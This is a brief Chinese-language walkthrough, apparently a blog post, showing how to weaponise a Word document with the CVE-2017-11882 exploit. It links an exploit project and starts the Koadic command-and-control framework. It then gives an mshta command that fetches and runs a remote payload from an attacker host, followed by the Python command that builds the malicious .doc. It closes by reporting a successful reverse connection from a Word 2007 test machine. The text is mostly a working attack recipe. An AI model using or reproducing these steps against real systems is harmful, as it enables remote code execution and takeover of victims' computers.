项目地址:https://github.com/iBearcat/CVE-2017-11882
首先开启koadic,然后配置一下
复制这句代码
mshta http://192.168.220.132:9999/dHem0
然后生成doc文件
┌─[root@sch01ar]─[/sch01ar/CVE-2017-11882] └──╼ #python Command_CVE-2017-11882.py -c "mshta http://192.168.220.132:9999/dHem0" -o sch01ar.doc
注:命令长度不能超过43 bytes
然后拿到靶机里测试
打开文件(word测试版本为2007)
目标主机反弹成功